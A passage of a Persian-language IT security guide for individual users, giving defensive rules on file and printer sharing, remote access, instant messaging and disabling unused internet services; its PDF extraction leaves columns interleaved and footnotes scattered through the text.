ﺷﺒﻜﻪ ﻣﻲﺑﺎﺷﺪ .ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﺎﻟﺖ ،ﺍﻳﻦ ﻭﻳﮋﮔﻲ ﺷـﻤﺎ ﺭﺍ ﻗـﺎﺩﺭ
ﻣﻲﺳﺎﺯﺩ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ
ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﻳﮕـﺮ ﺩﺳﺘﺮﺳـﻲ ﻳﺎﺑﻴـﺪ ،ﺁﻧﻬـﺎ ﺭﺍ ﺗﻐﻴﻴـﺮ
ﺩﻫﻴﺪ ،ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺟﺪﻳﺪ ﺑﺴﺎﺯﻳﺪ ،ﻭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ
ﺩﺭ ﺁﻧﺮﺍ ﺣﺬﻑ ﻧﻤﺎﻳﻴﺪ .ﺩﻭ ﺳﻴﺴﺘﻢ ﻣﺠﺰﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳـﻚ
Local Loop Wireless Telephones
99
ﺑﺨﺶ ﺩﻭﻡ
ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑـﻲﺳـﻴﻢ ٩٦ﻣـﻲﺑﺎﺷـﺪ 802.11 .ﻛـﻪ
ﻣﻌﻤﻮ ﹰﻻ ٩٧Wi-Fiﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ ،ﺑﻌﻨـﻮﺍﻥ ﺟـﺎﻳﮕﺰﻳﻦ ﺍﺗﺮﻧـﺖ
ﺳﻴﻤﻲ ٩٨ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ
ﻣﺤﺒﻮﺑﻴﺖ ﻳﺎﻓﺘﻪ ﻭ ﻣـﺰﻳﺘﺶ ﺍﺭﺯﺍﻥ ﺑـﻮﺩﻥ ﻭ ﺳـﺮﻋﺖ ﻧـﺴﺒﻲ ﺁﻥ
ﺍﺳﺖ.
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻦ ﺳﻴﺎﺭ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻭ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﺍﻳﻤﻦ ﻧﻤﻲﺑﺎﺷﻨﺪ.
٩٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺗﺎﻕ ﻳﺎ ﻫﺮﻛﺪﺍﻡ ﺩﺭ ﻳﻚ ﻧﻴﻤﻜﺮﺓ ﺯﻣﻴﻦ ﺑﺎﺷﻨﺪ .ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﻳﻦ
ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛـﻪ ﺩﺭ ﻃـﻮﻝ ﻣـﺴﺎﻓﺮﺗﻬﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ
ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﻨﻔﺮﺩ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ ١٠٠ﻋﻤـﻞ
ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﺩﻳﺴﻚ ﺳﺨﺖ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻠﻘﻲ
ﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻴﺸﺘﺮ ﻓﺎﻳﻠﻬـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ
ﻓﺎﻳﻞ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺁﻧﻬﺎ
ﺩﺳﺖ ﻳﺎﺑﻴﺪ.
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻭﺍﺿﺤﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ
ﺷﻤﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ ،ﺍﻓـﺮﺍﺩ
ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ .ﻳـﻚ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ
ﺿﻌﻴﻔﺘﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺑـﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ
ﺑﮕﺬﺍﺭﻳﺪ ،ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ
ﻼ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﻪ ﺑـﻪ
ﺁﻧﻬﺎ ﭘﻴﺶ ﺁﻳﺪ ﺩﺭ ﺍﻣﺎﻥ ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻣﺜ ﹰ
ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺗﻮﺳﻂ ﻳﻚ ﻭﻳﺮﻭﺱ ﺁﻟﻮﺩﻩ ﺷـﻮﺩ،
ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﻧﻴﺰ ﺁﻟﻮﺩﻩ ﮔﺮﺩﻧﺪ.
ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﭽﻪ ﻛﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺍﻧﺠـﺎﻡ
ﻣﻲﺩﻫﺪ )ﺧﻮﺍﻧﺪﻥ ،ﻧﻮﺷﺘﻦ ،ﺍﻳﺠﺎﺩ ﻭ ﭘـﺎﻙ ﻧﻤـﻮﺩﻥ( ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻣﻲ ﺍﻋﻤـﺎﻝ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺭﺍ
ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺴﻬﻴﻼﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﻣﺤــﺪﻭﺩ ﺳــﺎﺯﻳﺪ ﻛــﻪ ﺑــﻪ ﻓﺎﻳﻠﻬــﺎ ﺗﻨﻬــﺎ ﺍﺟــﺎﺯﺓ
ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﺑﺪﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔـﺮ ﻧﻴـﺎﺯﻱ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ
ﻧﻮﺷﺘﻦ ﻧﺪﺍﺭﻳﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﻏﻴﺮ ﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﺎﭘﮕﺮﻫﺎ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧـﺪ .ﺍﮔﺮﭼـﻪ
ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﭼﺎﭘﮕﺮ ﭼﻨﺪﺍﻥ ﭘﺮﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺖ ،ﺍﻣﺎ
ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﻢ ﻣﮕﺮ ﺁﻧﻜـﻪ ﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﭼﺎﭘﮕﺮ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺠﻮﺯﻫﺎﻳﻲ ﻛﻪ ﺍﺧﺘـﺼﺎﺻﹰﺎ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎﻱ
ﭼﺎﭘﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ،ﺍﻣﻜﺎﻥ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ.
ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ
ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴـﺪ ﺁﻧـﺮﺍ
ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻪ ﺁﻥ ،ﺩﺳﺘﺮﺳﻴﻬﺎﻱ
ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﻗﻌ ﹰﺎ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﭘﻴﺎﻡ
ﺗﺎﻳﭗﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺰﻣﺎﻥ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕـﺮ ﺑـﻪ
ﻧﻤــﺎﻳﺶ ﺩﺭﺁﻳــﺪ .ﺑــﺮﺧﻼﻑ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ
ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﻪ
ﺑﺎﺷﻨﺪ .ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺩﺍﺭﺩ .ﺩﺭ
ﻣﻴــﺎﻥ ﺁﻧﻬــﺎ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ،١٠١IRC ،MSN Messenger
،١٠٢AIM ،Yahoo Chatﻭ ﻧﻴﺰ ١٠٣ICQﺍﺷﺎﺭﻩ ﻧﻤﻮﺩ.
ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ،ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ ﻭ
ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺑـﻪ ﻛﻤﺘـﺮﻳﻦ ﺣـﺪ ﻣﻤﻜـﻦ ﻛـﻪ
ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺭ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫﻴـﺪ
ﻣﺤﺪﻭﺩ ﺳﺎﺯﻳﺪ.
ﺍﺭﺗﺒﺎﻃـــﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـــﻲ ﺍﺯ ﻗﺒﻴـــﻞ ،Yahoo ،MSN ،AOL
ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ...ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ Messenger
ﻭ Chatﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺳـﺎﻳﺮﻳﻦ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻧﺠـﺎﻡ
ﻧﻤﻲﺩﻫﻨﺪ.
ﻗﺎﻧﻮﻥ ﭘﺎﻧﺰﺩﻫﻢ:
ﻗﺎﻧﻮﻥ ﺷﺎﻧﺰﺩﻫﻢ:
ﻗﺎﻧﻮﻥ ﻫﻔﺪﻫﻢ:
ﺍﮔﺮ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﻣـﻲﮔﺬﺍﺭﻳـﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ.
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻭ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ
ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﻭ ﻧﺎﻣﻬـﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـﺎﻱ
100 File Server
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ ﺑـﻪ ﻛـﺎﺭﺑﺮ ﺍﺟـﺎﺯﻩ
ﻣﻲﺩﻫﻨﺪ ﺍﺳﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﺪ ﻛﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﺑـﻪ
ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺳﺎﻳﺮﻳﻦ ﻧﻴﺰ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻭ ﭘﻴـﺎﻡ
ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻦ ﺍﺳﺎﻣﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺷﻮﻧﺪ ﻛﻪ ﻫﻮﻳﺖ
ﺍﺻﻠﻲ ﺷﻤﺎ ﭘﻨﻬﺎﻥ ﺑﻤﺎﻧﺪ ،ﺍﮔﺮﭼﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺑﺘﻮﺍﻧﻨﺪ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺁﺩﺭﺱ IPﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ.
101 Internet Relay Chat
102 AOL Instant Messenger
۱۰۳ﻳﻚ ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﺑﺮﺍﻱ ﻋﺒﺎﺭﺕ "" I Seek You
٩١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻗﺎﻧﻮﻥ ﻫﺠﺪﻫﻢ:
ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺑـﺴﻴﺎﺭ ﻣﻔﻴـﺪ
ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺍﺯ ﺁﻥ ﺑﺎ ﺁﮔﺎﻫﻲ ﻭ ﺩﻗﺖ ﻛﺎﻣﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺑـﻪ ﭼﻨـﺪ ﺩﻟﻴـﻞ ﻧﻘـﺶ ﻣﻔﻴـﺪﻱ ﺍﻳﻔـﺎ
ﻣﻲﻛﻨﺪ:
•
ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﺸﻐﻮﻝ ﺍﻧﺠﺎﻡ ﻛـﺎﺭ ﺩﻳﮕـﺮﻱ ﻫـﺴﺘﻴﺪ ﭘﻴـﺎﻡ ﺩﺭ
ﭘﻨﺠﺮﺓ ﻛـﻮﭼﻜﻲ ﺭﻭﻱ ﺻـﻔﺤﺔ ﺷـﻤﺎ ﺩﺭﻳﺎﻓـﺖ ﻭ ﺍﺭﺳـﺎﻝ
ﻣﻲﮔﺮﺩﺩ ﻭ ﭼﻨﺪﺍﻥ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﺳﺎﻳﺮ ﻛﺎﺭﻫﺎﻳﺘﺎﻥ
ﻧﻤﻲﺷﻮﺩ.
•
ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻛـﻪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻭ ﻫﻮﻳـﺖ(
ﺧــﻮﺩ ﺭﺍ ﺑــﺮﺍﻱ ﺳــﺎﻳﺮ ﺷــﺮﻛﺖﻛﻨﻨــﺪﮔﺎﻥ ﺩﺭ ﮔﻔﺘﮕﻮﻫــﺎﻱ
ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻓﺎﺵ ﻛﻨﻴﺪ.
ﺩﺭ ﻣﻮﺍﺭﺩ ﺧﺎﺹ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺴﺒﺖ ﺑـﻪ
ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺟﺢ ﺍﺳﺖ .ﺩﺭﻧﻈﺮ ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ
ﺳﺮﻭﻳﺲ ﺍﻳﻤﻦﺗﺮ ﻧﻴﺰ ﻫﺴﺖ؛ ﭼﺮﺍﻛﻪ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﻣﻜﺎﻧﻬـﺎﻱ ﺩﻳﮕـﺮ
ﺩﻳﺴﻚ ﻛﭙﻲ ﻧﻤﻲﺷﻮﻧﺪ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺩﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻳـﻦ
ﺍﺗﻔﺎﻕ ﻣﻲﺍﻓﺘﺪ .ﺑﻪ ﻫﺮﺣﺎﻝ ﻫﻨﻮﺯ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ
ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﺁﻧﻬﺎ ﺍﻳﻤﻦ ﻧﺒﺎﺷﺪ .ﻣﺸﻜﻞ ﺍﺻﻠﻲ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺑﻌـﻀﻲ ﺍﺯ ﺁﻧﻬـﺎ ﻗﺎﺑﻠﻴـﺖ
ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ ﻫــﻢ ﺩﺍﺭﻧــﺪ .ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﺁﻧﻬــﺎ ﺭﺍ ﻣﺎﻧﻨــﺪ ﺳــﺎﻳﺮ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﻙ ﻓﺎﻳﻞ -ﻣﺜﻞ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ -
ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ
ﺍﺟﺎﺯﺓ ﺍﺟﺮﺍﻱ ﺩﺳـﺘﻮﺭﺍﺕ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻧﻴـﺰ ﻣـﻲﺩﻫﻨـﺪ ﻭ ﺍﻳﻨﻜـﺎﺭ
ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑﻪ ﻭﻗﻮﻉ ﺗﻬﺎﺟﻢ ﮔﺮﺩﺩ.
ﻗﺎﻧﻮﻥ ﻧﻮﺯﺩﻫﻢ:
ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺍﺯ
ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ.
ﻋﺮﺿﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻄﻮﺭ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺁﮔﺎﻩﺷﺪﻥ ﺍﺯ
ﻣﺸﻜﻼﺕ ﻫﺴﺘﻨﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻋﻠﻴﺮﻏﻢ ﻋﻼﻗـﺔ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﻪ ﻭ
ﻋﺮﺿﺔ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺑﺎ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺯﻳﺎﺩ ،ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﺎ
ﺧﺪﻣﺎﺕ ﻓﺮﻋﻲ ﻏﻴﺮﻓﻌﺎﻝﺷﺪﻩ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﻛﺎﺭﺑﺮ ﺩﺭﺻﻮﺭﺕ
ﻧﻴﺎﺯ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮﻳـﻚ ﺍﺯ ﺁﻧﻬـﺎ ﺭﺍ ﻓﻌـﺎﻝ ﺳـﺎﺯﺩ .ﻏﻴﺮﻓﻌـﺎﻝ ﺑـﻮﺩﻥ
ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺻﻲ ﻧﻤـﻲﺷـﻮﺩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ
ﺩﺍﺭﺩ .ﭼﻨــﻴﻦ ﺧــﺪﻣﺎﺗﻲ ﺷــﺎﻣﻞ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳﻠﻬــﺎ ﻭ ﭼــﺎﭘﮕﺮ،
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﻭﺏ ،ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﭘﺮﻭﺗﻜــﻞ ﺍﻧﺘﻘــﺎﻝ ﻓﺎﻳــﻞ
